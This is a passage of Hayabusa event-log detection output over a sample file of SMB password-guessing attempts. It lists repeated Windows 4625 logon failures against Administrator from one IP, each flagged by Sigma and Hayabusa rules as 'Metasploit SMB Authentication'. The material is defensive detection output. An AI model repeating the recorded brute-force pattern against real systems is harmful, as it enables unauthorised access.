Password,User: Administrator : Type: 3 : Workstation: k8uSVFRTLTB6g1eg : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:11.551 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:11.592 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ire6VOUMWZQnNjES : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:11.592 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:11.629 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: pGWnvKUXnbJvRqql : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:11.629 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:11.666 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: xBVvrrLf1rnAviKS : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:11.666 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:11.704 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: NE9atGNBlSLQLLcX : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:11.704 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:11.744 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: a0M5EaAXziu07hOH : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:11.744 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:11.784 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: PM1mwxqI7yVgoK2D : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:11.784 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:11.836 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: MPqnpvetHXdThxYg : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:11.836 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:11.879 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: gthbVQMJ7UD2QS7H : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:11.879 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:11.920 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: AwwJXCoC3gMDoDn7 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:11.920 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:12.068 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: ilNNoVbZpyhtsNkV : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:12.068 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:12.109 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: eNY0lv9IglfHP34d : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:12.109 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:12.167 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: BjSeQciwy17L7raV : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:12.167 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:12.208 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: wycE1fIsmPq9zaMU : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:12.208 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:12.241 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 5z1spxImm2ZlGOld : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:12.241 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:12.294 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Dg7o4GCET1bJrlEU : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:12.294 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:12.376 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: E7Db3OLA0XPXL1B4 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:12.376 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:12.417 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Uoqx5iPRp2tfYYos : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:12.417 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:12.448 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Ixw5XWC2frtrTUkv : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:12.448 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:12.495 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 3v0NpzAp7io9gbZQ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:12.495 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:12.536 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: AfOOiR2zO5xem9Tk : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:12.536 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:12.582 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: yiGtitRqZbGNKrtN : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:12.582 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:12.623 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 7oQ70LvSMnGxBCFO : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:12.623 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:12.660 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: JGHr8623vHZyMY5B : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:12.660 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:12.707 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: X5Y1C9A4XqxQGoVA : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:12.707 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:12.745 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: SOnirLGOZzRVSt3y : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:12.745 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:12.772 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: jLu7XtYCHPqVNE7u : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:12.772 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:12.811 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: w242Ei1CpWErEE4m : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:12.811 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:12.847 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: UOZUagVG4R6zcK92 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:12.847 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:12.891 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 7hQOl8XV3Ydp8UcW : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:12.891 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:12.927 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: u1XBRDfoN0I2iu6L : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:12.927 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:12.963 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ngyknhk7uGvs38bG : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:12.963 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:12.996 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: QXZUhLVsfRUBDcsu : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:12.996 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:13.045 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: VEDAtkhiSqUcLj2i : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:13.045 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:13.088 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: M4CmH02M91kHzeK2 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:13.088 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:13.125 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 5St1kWrKP4PZlOIy : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:13.125 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:13.156 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 17A6k4Om84gunQfB : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:13.156 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:13.195 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Y9GfR4XdixrNJHny : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:13.195 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:13.236 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 27JWPfEV4DgS1tNv : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:13.236 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:13.280 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: yNeJnXg1pyedSpqU : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:13.280 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:13.324 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: WWihv14n9IAQXw2X : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:13.324 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:13.364 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Gy19bFWzQFaQZRBa : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:13.364 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:13.412 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: N28Ec4jkXkSNvsQ1 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:13.412 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:13.447 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: sD9qQWJbeukyPQbc : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:13.447 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:13.487 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: uoRSHXvwMeKg8cyQ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:13.487 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:13.528 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: bPEOhloL7vo1fTFQ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:13.528 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:13.564 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: glbLglffka5JqQCN : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:13.564 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
